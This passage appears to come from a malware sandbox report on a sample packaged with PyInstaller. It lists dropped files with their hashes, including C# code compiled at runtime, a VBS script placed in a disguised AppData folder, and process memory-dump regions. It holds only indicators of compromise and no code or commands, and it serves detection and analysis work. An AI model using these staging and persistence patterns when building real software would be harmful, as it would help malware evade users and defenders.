8af81d78a778875e63f99d7434724d772147da7ec07b88fb7094c9dcd02b86d08ce2bb3d3ee94d8c62156d2bf8331562b8c91b5e36a1278b64d0b6fd7eff45e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\base_library.zip
Filesize
1.7MB

MD5
e9c28bc7ae0276a2413d913fabe101cc

SHA1
baefb0b00eac192113737106bc76b02244c17838

SHA256
7ecd1dfe0dcc82c2e595729cb238acb890326adc87136334ce9c21a5f0c847bf

SHA512
c25532849462e0dc1e3e7fd5f0dcc93a5dc18c7b29920819143ec30fec899f98cb8a538ab0084b9ba91f62705de3dededef6acfae02daf1efceabac3819804e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\certifi\cacert.pem
Filesize
268KB

MD5
59a15f9a93dcdaa5bfca246b84fa936a

SHA1
7f295ea74fc7ed0af0e92be08071fb0b76c8509e

SHA256
2c11c3ce08ffc40d390319c72bc10d4f908e9c634494d65ed2cbc550731fd524

SHA512
746157a0fcedc67120c2a194a759fa8d8e1f84837e740f379566f260e41aa96b8d4ea18e967e3d1aa1d65d5de30453446d8a8c37c636c08c6a3741387483a7d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\libcrypto-1_1.dll
Filesize
3.3MB

MD5
6f4b8eb45a965372156086201207c81f

SHA1
8278f9539463f0a45009287f0516098cb7a15406

SHA256
976ce72efd0a8aeeb6e21ad441aa9138434314ea07f777432205947cdb149541

SHA512
2c5c54842aba9c82fb9e7594ae9e264ac3cbdc2cc1cd22263e9d77479b93636799d0f28235ac79937070e40b04a097c3ea3b7e0cd4376a95ed8ca90245b7891f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\libffi-8.dll
Filesize
37KB

MD5
d86a9d75380fab7640bb950aeb05e50e

SHA1
1c61aaf9022cd1f09a959f7b2a65fb1372d187d7

SHA256
68fba9dd89bfad35f8fd657b9af22a8aebda31bffda35058a7f5ae376136e89b

SHA512
18437e64061221be411a1587f634b4b8efa60e661dbc35fd96a6d0e7eff812752de0ada755c01f286efefc47fb5f2daf07953b4cfc4119121b6bee7756c88d0f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\libssl-1_1.dll
Filesize
686KB

MD5
8769adafca3a6fc6ef26f01fd31afa84

SHA1
38baef74bdd2e941ccd321f91bfd49dacc6a3cb6

SHA256
2aebb73530d21a2273692a5a3d57235b770daf1c35f60c74e01754a5dac05071

SHA512
fac22f1a2ffbfb4789bdeed476c8daf42547d40efe3e11b41fadbc4445bb7ca77675a31b5337df55fdeb4d2739e0fb2cbcac2feabfd4cd48201f8ae50a9bd90b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\python3.DLL
Filesize
64KB

MD5
7feb3da304a2fead0bb07d06c6c6a151

SHA1
ee4122563d9309926ba32be201895d4905d686ce

SHA256
ddd2c77222e2c693ef73d142422d6bf37d6a37deead17e70741b0ac5c9fe095b

SHA512
325568bcf1835dd3f454a74012f5d7c6877496068ad0c2421bf65e0640910ae43b06e920f4d0024277eee1683f0ce27959843526d0070683da0c02f1eac0e7d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\python311.dll
Filesize
5.5MB

MD5
a72993488cecd88b3e19487d646f88f6

SHA1
5d359f4121e0be04a483f9ad1d8203ffc958f9a0

SHA256
aa1e959dcff75a343b448a797d8a5a041eb03b27565a30f70fd081df7a285038

SHA512
c895176784b9ac89c9b996c02ec0d0a3f7cd6ebf653a277c20dec104da6a11db084c53dd47c7b6653a448d877ad8e5e79c27db4ea6365ebb8ca2a78aa9c61b38

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\select.pyd
Filesize
28KB

MD5
116335ebc419dd5224dd9a4f2a765467

SHA1
482ef3d79bfd6b6b737f8d546cd9f1812bd1663d

SHA256
813eede996fc08e1c9a6d45aaa4cbae1e82e781d69885680a358b4d818cfc0d4

SHA512
41dc7facab0757ed1e286ae8e41122e09738733ad110c2918f5e2120dfb0dbff0daefcad2bffd1715b15b44c861b1dd7fb0d514983db50ddc758f47c1b9b3bf3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\unicodedata.pyd
Filesize
1.1MB

MD5
cdb5f373d24adceb4dc4fa1677757f0c

SHA1
af6b381eed65d244c57129346008ec8532ba336b

SHA256
175c4cb528f1ac4e285c575cc3f5e85ec4b3ae88860210b5d795b580c7f0b5d9

SHA512
429a326648c761bf068ca7735094644f532d631cf9355c9f1a5743a5791837a36cd6aa2efe2265c7541feb06310d0c07b634dd04438d8eddbdf1c4147938a868

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fbfgze5g.02x.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\oikjrjhe\oikjrjhe.dll
Filesize
7KB

MD5
139bd01640d0b24bddae7f04d90f2537

SHA1
ed32b7a14a26af8f6a25e5a4409549f844a3a29d

SHA256
5a9bb119fadcdc48ed3e54df453577f69e9d4e5258e7ffa1a1a5b2a44de07c63

SHA512
00d47cfabad81b83382abb2def4e28d42cda859e3a4c8c7ac8310d940b01c05f59513a2d74d65d440e1241b5b0f0b40284c92d0dd00e5e2c2feacc8a8b77b2a1

Download Submit
C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs
Filesize
3KB

MD5
2ff38404d1ba59afb5227b767a10edb2

SHA1
d2ebdf09dd8a774ce26bc7188a8ef55599c1ea6f

SHA256
89661bf5e2229259732dccf803338d3aebc5d992c53d264321285784e7e39ca8

SHA512
707126f8f0834486acdecd78e62658a9c3951fd21c0433d3253984074aba981540682d5573a78ce3e3747d4f2edf5a6853501841538eda81e9bdc15f388c4832

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\oikjrjhe\CSCC888C55530274DE68E10821A87175D4.TMP
Filesize
652B

MD5
7d2d64adf977af52c44a5aac9cb0ed60

SHA1
e008e244078b4f9b53c99cbe665dca4346054a4b

SHA256
20d6008536099658d1f4e91cd8f50eae56f46a68f3e1995db01564eb3e14a4fd

SHA512
9d8ed264f6f398fd892e5c4028a4beee423fcf4f3d0feb997db9e8b03a9896f45eaf81300018e9d0ece5bcb5488a7888954cb23c83f905e2ba06620878608e91

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\oikjrjhe\oikjrjhe.0.cs
Filesize
8KB

MD5
33d072d07a771b09fd1ba7d284a3e578

SHA1
9f38e71ce7633e16c3781cd57d084b1d040f6fd0

SHA256
3b637c3cafd1b8651d41dbf54a872316640609fe586eea711f8990eab29ef643

SHA512
61fcafd4448f254c6564f828d8feb19e7079d293050df34c4c215597c8d5cc5f9d52ea0eb39c643338a2ce8d82903be563f8faa598157689eaf9e3ac53b60bd4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\oikjrjhe\oikjrjhe.cmdline
Filesize
369B

MD5
fbf74512086b3e8c7559c867423d6ed9

SHA1
acff1ce392d24b431349268ad224e8d1247be9b9

SHA256
bcd8b5e6d55e18dfcead15b84e2f6006c5564cfff529d19e5b7518ce0094d2b3

SHA512
d59eaef557526f3529c4fb7cd88ea6771e7e2ef78cd4b46dd644b3b1f13ec4fc2f9bb658f157061e662903ebcade2a53b26e7ef09353a77863c5e01080742cf0

Download Submit
memory/2272-110-0x00000000082D0000-0x000000000894A000-memory.dmp

Filesize
6.5MB

Download
memory/2272-108-0x0000000006970000-0x000000000698E000-memory.dmp

Filesize
120KB

Download
memory/2272-111-0x0000000006EB0000-0x0000000006ECA000-memory.dmp

Filesize
104KB

Download
memory/2272-88-0x00000000053B0000-0x00000000053E6000-memory.dmp

Filesize
216KB

Download
memory/2272-89-0x0000000005B50000-0x0000000006178000-memory.dmp

Filesize
6.2MB

Download
memory/2272-92-0x0000000005AD0000-0x0000000005AF2000-memory.dmp

Filesize
136KB

Download
memory/2272-93-0x00000000062B0000-0x0000000006316000-memory.dmp

Filesize
408KB

Download
memory/2272-94-0x0000000006320000-0x0000000006386000-memory.dmp

Filesize
408KB

Download
memory/2272-104-0x0000000006390000-0x00000000066E4000-memory.dmp

Filesize
3.3MB

Download
memory/2272-109-0x00000000069B0000-0x00000000069FC000-memory.dmp

Filesize
304KB

Download
memory/2272-124-0x0000000006F50000-0x0000000006F58000-memory.dmp

Filesize
32KB

Download
memory/2868-106-0x00007FF74BA00000-0x00007FF74C046000-memory.dmp

Filesize
6.3MB

Download
memory/2868-144-0x00007FF74BA00000-0x00007FF74C046000-memory.dmp

Filesize
6.3MB

Download
memory/2868-3-0x00007FF74BA00000-0x00007FF74C046000-memory.dmp

Filesize
6.3MB

Download
memory/2868-2-0x00007FF74BA00000-0x00007FF74C046000-memory.dmp

Filesize
6.3MB

Download
memory/2868-1-0x00007FF74BA00000-0x00007FF74C046000-memory.dmp

Filesize
6.3MB

Download
memory/2868-0-0x00007FF74BA00000-0x00007FF74C046000-memory.dmp

Filesize
6.3MB

Download
memory/4344-126-0x0000000000400000-0x000000000044E000-memory.dmp

Filesize
312KB

Download
memory/4344-148-0x00000000066D0000-0x00000000066DA000-memory.dmp

Filesize
40KB

Download
memory/4344-127-0x00000000055E0000-0x0000000005B84000-memory.dmp

Filesize
5.6MB

Download
memory/4344-128-0x0000000005030000-0x00000000050C2000-memory.dmp

Filesize
584KB

Download
memory/4344-145-0x0000000005F10000-0x0000000005F22000-memory.dmp

Filesize
72KB

Download
memory/4344-146-0x0000000006350000-0x000000000638C000-memory.dmp

Filesize
240KB

Download
memory/4788-36-0x00007FF74BA00000-0x00007FF74C046000-memory.dmp

Filesize
6.3MB

Download
memory/4788-107-0x00007FF74BA00000-0x00007FF74C046000-memory.dmp

Filesize
6.3MB

Download
memory/4788-39-0x00007FF74BA00000-0x00007FF74C046000-memory.dmp

Filesize
6.3MB

Download
memory/4788-129-0x00007FF74BA00000-0x00007FF74C046000-memory.dmp

Filesize
6.3MB

Download
memory/4788-37-0x00007FF74BA00000-0x00007FF74C046000-memory.dmp

Filesize
6.3MB

Download
memory/4788-38-0x00007FF74BA00000-0x00007FF74C046000-memory.dmp

Filesize
6.3MB

Download
memory/4868-87-0x0000017310FA0000-0x0000017310FC2000-memory.dmp

Filesize
136KB

Download